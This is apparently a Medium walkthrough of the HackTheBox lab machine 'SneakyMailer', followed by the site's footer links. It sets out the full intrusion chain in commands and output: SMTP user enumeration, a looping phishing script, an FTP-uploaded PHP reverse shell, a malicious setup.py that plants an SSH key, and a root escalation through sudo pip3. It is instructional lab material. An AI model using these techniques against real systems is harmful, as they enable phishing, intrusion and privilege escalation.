SneakyMailer | HackTheBox Writeup

  • enumerating web server on port 80 to get a bunch of email addresses
  • verifying valid emails using smtp-user-enum
  • Sending mail to all employees with IP address controlled by the attacker and getting a response
  • logging on a mail client to read victim emails
  • logging on the FTP server and uploading PHP reverse shell
  • uploading custom python package to PyPI server with payload in setup.py
  • Getting root shell as the user low on the box can run pip3 as sudo

PortScan

PORT     STATE SERVICE
21/tcp open ftp
22/tcp open ssh
25/tcp open smtp
80/tcp open http
143/tcp open imap
993/tcp open imaps
8080/tcp open http-proxy

Port 80

10.10.10.197    sneakycorp.htb

Gobuster

$ gobuster dir -u http://sneakycorp.htb/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt  -x php/index.php (Status: 200)
/img (Status: 301)
/css (Status: 301)
/team.php (Status: 200)
/js (Status: 301)
/vendor (Status: 301)
/pypi (Status: 301)
$ gobuster dir -u http://sneakycorp.htb/pypi/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt  -x php/register.php (Status: 200)

SMTP-Port 25

  1. The first email was from the team.php site. ie <airisatou@sneakymailer.htb> which turns out to be a valid email as we get 252 response from the server. You can check out the server return codes in here.
VRFY <airisatou@sneakymailer.htb>
252 2.0.0 <airisatou@sneakymailer.htb>
VRFY <thisemaildoesnotexists@email.com>
454 4.7.1 <thisemaildoesnotexists@email.com>: Relay access denied
VRFY <thisemaildoesnotexist@sneakymailer.htb>
550 5.1.1 <thisemaildoesnotexist@sneakymailer.htb>: Recipient address rejected: User unknown in virtual mailbox table

Using smtp-user-enum

$ smtp-user-enum -U email.txt 10.10.10.197 25                                                                                    [19/19]
Connecting to 10.10.10.197 25 ...
220 debian ESMTP Postfix (Debian/GNU)
250 debian
Start enumerating users with VRFY mode ...
[----] <airisatou@sneakymailer.htb> 252 2.0.0 <airisatou@sneakymailer.htb>
[----] <angelicaramos@sneakymailer.htb> 252 2.0.0 <angelicaramos@sneakymailer.htb>
[----] <ashtoncox@sneakymailer.htb> 252 2.0.0 <ashtoncox@sneakymailer.htb>
[----] <bradleygreer@sneakymailer.htb> 252 2.0.0 <bradleygreer@sneakymailer.htb>
[----] <brendenwagner@sneakymailer.htb> 252 2.0.0 <brendenwagner@sneakymailer.htb>
[----] <briellewilliamson@sneakymailer.htb> 252 2.0.0

Sending Email using SMTP protocol

$ nc 10.10.10.197 25
220 debian ESMTP Postfix (Debian/GNU) #hello message
MAIL FROM:<this_email_doesnot_exist@email.com> #non valid email
250 2.1.0 Ok
RCPT TO:<airisatou@sneakymailer.htb> #valid email
250 2.1.5 Ok
DATA
354 End data with <CR><LF>.<CR><LF>
http://10.10.14.167/clickme #email content with my ip
.
250 2.0.0 Ok: queued as DE8202466A
#!/bin/bash
for sender in $(cat email) #email contains lists of emails
do
for rcv in $(cat email)
do
echo "mail from:$sender"
echo "rcpt to:$rcv"
echo "data"
echo "Subject: Looking for a job"
echo "http://10.10.14.167/clickme" #attackers ip
echo "."
done
done
$ ./sendmail.sh | nc 10.10.10.197 25
$ sudo nc -nvklp 80
POST /clickme%0D HTTP/1.1
Host: 10.10.14.167
User-Agent: python-requests/2.23.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
Content-Length: 185
Content-Type: application/x-www-form-urlencoded
firstName=Paul&lastName=Byrd&email=paulbyrd%40sneakymailer.htb&password=%5E%28%23J%40SkFv2%5B%25KhIxKk%28Ju%60hqcHl%3C%3AHt&rpassword=%5E%28%23J%40SkFv2%5B%25KhIxKk%28Ju%60hqcH
l%3C%3AHt
  • Email: paulbyrd@sneakymailer.htb
  • Password: ^(#J@SkFv2[%KhIxKk(Ju`hqcHl<:Ht

FTP

$ ftp 10.10.10.197
Connected to 10.10.10.197.
220 (vsFTPd 3.0.3)
Name (10.10.10.197:root): paulbyrd
530 Permission denied.
Login failed.
ftp>

IMAP (PORT 143)

$ nc 10.10.10.197 143
* OK [CAPABILITY IMAP4rev1 UIDPLUS CHILDREN NAMESPACE THREAD=ORDEREDSUBJECT THREAD=REFERENCES SORT QUOTA IDLE ACL ACL2=UNION STARTTLS ENABLE UTF8=ACCEPT] Courier-IMAP ready. Copyright 1998-2018 Double Precision, Inc. See COPYING for distribution information.
A1 AUTHENTICATE LOGIN #initiating authentication
+ VXNlcm5hbWU6 #asking for email
cGF1bGJ5cmRAc25lYWt5bWFpbGVyLmh0Ygo= #email in b64 form
+ UGFzc3dvcmQ6 # asking for password
XigjSkBTa0Z2MlslS2hJeEtrKEp1YGhxY0hsPDpIdAo= #password in b64 form
A1 NO Login failed.
apt install claws-mail
From: Paul Byrd <paulbyrd@sneakymailer.htb>
To: low@debian
Subject: Module testing
Date: Wed, 27 May 2020 13:28:58 -0400
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101
Thunderbird/68.8.0
Hello lowYour current task is to install, test and then erase every python module you
find in our PyPI service, let me know if you have any inconvenience.
From: Paul Byrd <paulbyrd@sneakymailer.htb>
To: root <root@debian>
Subject: Password reset
Date: Fri, 15 May 2020 13:03:37 -0500
Hello administrator, I want to change this password for the developer accountUsername: developer
Original-Password: m^AsY7vTKVT+dV1{WOU%@NaHkUAId3]C
Please notify me when you do it

FTP

$ ftp 10.10.10.197
Connected to 10.10.10.197.
220 (vsFTPd 3.0.3)
Name (10.10.10.197:root): developer
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp>
ftp> dir -a
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x 3 0 0 4096 Jun 23 08:15 .
drwxr-xr-x 3 0 0 4096 Jun 23 08:15 ..
drwxrwxr-x 8 0 1001 4096 Aug 12 06:17 dev
226 Directory send OK.
ftp>
ftp> cd dev
250 Directory successfully changed.
ftp> dir -a
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxrwxr-x 8 0 1001 4096 Aug 12 06:17 .
drwxr-xr-x 3 0 0 4096 Jun 23 08:15 ..
drwxr-xr-x 2 0 0 4096 May 26 19:52 css
drwxr-xr-x 2 0 0 4096 May 26 19:52 img
-rwxr-xr-x 1 0 0 13742 Jun 23 09:44 index.php
drwxr-xr-x 3 0 0 4096 May 26 19:52 js
drwxr-xr-x 2 0 0 4096 May 26 19:52 pypi
drwxr-xr-x 4 0 0 4096 May 26 19:52 scss
-rwxr-xr-x 1 0 0 26523 May 26 20:58 team.php
drwxr-xr-x 8 0 0 4096 May 26 19:52 vendor
226 Directory send OK.
ftp> put shell.php
local: shell.php remote: shell.php
200 PORT command successful. Consider using PASV.
150 Ok to send data.
226 Transfer complete.
5494 bytes sent in 0.00 secs (20.7094 MB/s)
ftp>

GOBUSTER

$ gobuster vhost -u sneakycorp.htb -w /usr/share/wordlists/SecLists-master/Discovery/DNS/namelist.txtFound: dev.sneakycorp.htb (Status: 200) [Size: 13742]
10.10.10.197    sneakycorp.htb dev.sneakycorp.htb
$ nc -nvlp 9001
Listening on [0.0.0.0] (family 2, port 9001)
Listening on 0.0.0.0 9001
Connection received on 10.10.10.197 48272
Linux sneakymailer 4.19.0-9-amd64 #1 SMP Debian 4.19.118-2 (2020-04-29) x86_64 GNU/Linux
07:30:02 up 1:32, 0 users, load average: 1.33, 1.15, 1.05
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$
$ python -c "import pty;pty.spawn('/bin/bash')"
www-data@sneakymailer:/$
$ stty raw -echo
$ fg
www-data@sneakymailer:/$ export TERM=xterm

PRIVILEGE ESCALATION

www-data@sneakymailer:~$ ls -la /var/www
total 24
drwxr-xr-x 6 root root 4096 May 14 18:25 .
drwxr-xr-x 12 root root 4096 May 14 13:09 ..
drwxr-xr-x 3 root root 4096 Jun 23 08:15 dev.sneakycorp.htb
drwxr-xr-x 2 root root 4096 May 14 13:12 html
drwxr-xr-x 4 root root 4096 May 15 14:29 pypi.sneakycorp.htb
drwxr-xr-x 8 root root 4096 Jun 23 09:48 sneakycorp.htb
10.10.10.197   sneakycorp.htb dev.sneakycorp.htb pypi.sneakycorp.htb
$ ss -lt
State Recv-Q Send-Q Local Address:Port Peer Address:Port
LISTEN 0 5 127.0.0.1:5000 0.0.0.0:*

PORT 8080

www-data@sneakymailer:~/pypi.sneakycorp.htb$ ls -la
total 20
drwxr-xr-x 4 root root 4096 May 15 14:29 .
drwxr-xr-x 6 root root 4096 May 14 18:25 ..
-rw-r--r-- 1 root root 43 May 15 14:29 .htpasswd
drwxrwx--- 2 root pypi-pkg 4096 Jun 30 02:24 packages
drwxr-xr-x 6 root pypi 4096 May 14 18:25 venv
www-data@sneakymailer:~/pypi.sneakycorp.htb$ cat .htpasswd
pypi:$apr1$RV5c5YVs$U9.OTqF5n8K4mxWpSSR/p/
$ hashcat -m 1600 hash /usr/share/wordlists/rockyou.txt$apr1$RV5c5YVs$U9.OTqF5n8K4mxWpSSR/p/:soufianeelhaoui
  1. Creating directories and files
$ mkdir test   
$ cd test
$ mkdir package
$ touch setup.cfg; touch setup.py
$ touch README.md; touch package/__init__.py
  1. setup.py
from setuptools import setupsetup(
name='package',
packages=['package'],
description='Hello world enterprise edition',
version='0.1',
url='http://github.com/example/linode_example',
author='Linode',
author_email='docs@linode.com',
keywords=['pip','linode','example']
)
[metadata]
description-file = README.md
def hello_word():
print("hello world")
$ export HOME=`pwd`$ touch ~/.pypirc
$ cat ~/.pypirc 
[distutils]
index-servers =
pypi
linode
[pypi]
username:
password:
[linode]
repository: http://pypi.sneakycorp.htb:8080
username: pypi
password: soufianeelhaoui
$ python3 -m http.server 8000
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
www-data@sneakymailer:/dev/shm$ wget 10.10.14.167:8000/pspy64
www-data@sneakymailer:/dev/shm$ chmod +x pspy64
www-data@sneakymailer:/dev/shm$ ./pspy64
$ python setup.py sdist upload -r linode

PSPY

/bin/sh -c /usr/bin/tar -C /tmp/tmp19f4qjx_ -zxf /var/www/pypi.sneakycorp.htb/packages/package-0.1.tar.gz                        
/usr/bin/tar -C /tmp/tmp19f4qjx_ -zxf /var/www/pypi.sneakycorp.htb/packages/package-0.1.tar.gz
/home/low/venv/bin/python /opt/scripts/low/install-modules.py
/bin/sh -c /usr/bin/screen -d -m /opt/scripts/low/install-module.sh /tmp/tmp19f4qjx_/package-0.1/setup.py &
/usr/bin/screen -d -m /opt/scripts/low/install-module.sh /tmp/tmp19f4qjx_/package-0.1/setup.py
/bin/bash /opt/scripts/low/install-module.sh /tmp/tmp19f4qjx_/package-0.1/setup.py
/home/low/venv/bin/python /tmp/tmp19f4qjx_/package-0.1/setup.py install
/home/low/venv/bin/python /opt/scripts/low/install-modules.py
/home/low/venv/bin/python3 /home/low/venv/bin/pip uninstall package-0.1

Modifying setup.py to get a shell

$ ssh-keygen 
Generating public/private rsa key pair.
Enter file in which to save the key (/root/.ssh/id_rsa): sneakymailer
Enter passphrase (empty for no passphrase):
Enter same passphrase again:
Your identification has been saved in sneakymailer.
Your public key has been saved in sneakymailer.pub.
The key fingerprint is:
SHA256:NBsCstqBuzXuIYk5OpEEdiR2LjxNLoJn6ljxBUG2v8c root@kali
The key's randomart image is:
+---[RSA 3072]----+
| oo=*. |
|=oB= + |
|*=B+. o + |
|.O++ o o + |
|=.= . . S |
|*B . o |
|Ooo . E |
|o+ . . |
|... |
+----[SHA256]-----+
from setuptools import setup
import os
try:
os.system("echo 'ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDCtvax110OTMEuj4t0Jt1TiT8PaFeUAbDMj+o7Ju02JU7/04/MBpWUNh22snmlhL+JnGDkDmRVXJY5IZ7gNYzkE7lQKA2B2Koys5OyQ47okWr5/0ZeKqJROt8gUnKqKs0MeDMi1/29L7zy38nLMD7IB8ZxqbiO45359mGqqwKgGbcWx7nLnfpX8SNYS5h5+/uu1l+N6jsCk6qZt4bfk5U6N9S0SnSARSjC9077QqXHzEZFLjiJxYtK+p4goxAgGtaK91+RSpsdHO0WtPBAw/gL/F5eC+hU5Oz5e24/+dRDO3z4dnxBseTiCoj3Zfkz0Su11Q3hwQmS/T4AYPay0MnKkYy1vQ4vzFkj25LSmdOCQPGm04NsOmNc+ExxYpqI9LlgeOyle1IpXmeqnftXZvw/mSGkwcBY10P51ie33E05YRG/3TRla8HlfQjrj1puSctAGreBtSd9PO9VNql/FLViCzczJ+F4g9HFFc9QS50dCNo501hQLqcxLC1zt0MUEmk=' >> ~/.ssh/authorized_keys")
except:
pass
setup(
name='package',
packages=['package'],
description='Hello world enterprise edition',
version='0.1',
url='http://github.com/example/linode_example',
author='Linode',
author_email='docs@linode.com',
keywords=['pip','linode','example']
)
$ python setup.py sdist upload -r linode
$ ssh -i sneakymailer low@10.10.10.197
Linux sneakymailer 4.19.0-9-amd64 #1 SMP Debian 4.19.118-2 (2020-04-29) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
No mail.
Last login: Tue Jun 9 03:02:52 2020 from 192.168.56.105
low@sneakymailer:~$
low@sneakymailer:~$ cat user.txt  | wc -c
33
low@sneakymailer:~$ sudo -l
sudo: unable to resolve host sneakymailer: Temporary failure in name resolution
Matching Defaults entries for low on sneakymailer:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User low may run the following commands on sneakymailer:
(root) NOPASSWD: /usr/bin/pip3
low@sneakymailer:~$ TF=$(mktemp -d)
low@sneakymailer:~$ echo "import os; os.execl('/bin/sh', 'sh', '-c', 'sh <$(tty) >$(tty) 2>$(tty)')" > $TF/setup.py
low@sneakymailer:~$ sudo /usr/bin/pip3 install $TF
sudo: unable to resolve host sneakymailer: Temporary failure in name resolution
Processing /tmp/tmp.cA7sEWkFJt
# id
uid=0(root) gid=0(root) groups=0(root)
# cat /root/root.txt | wc -c
33

--

--

--

Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

How Are We Keeping Your Assets Safe? Fireblocks and Bitlocus — Security Overview

NebulaPlan New Year Community Campaign

The IPSec Framework overview

European digital identity wallets — the future of E.U. services

You’re Getting your OSCP

China’s Health Code app showcases the extreme smart surveillance regime

{UPDATE} Grow the Kingdom Hack Free Resources Generator

Lightening Cash: Privacy Protection Asset Transfer Protocol on Binance Smart Chain

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Shishir Subedi

Shishir Subedi

More from Medium

HACK THE BOX — PAPER WALKTHROUGH

TryHackMe Lumberjack-Turtle Writeup

Write-up: SQL injection UNION attack, finding a column containing text @ PortSwigger Academy

TryHackMe GamingServer Walkthrough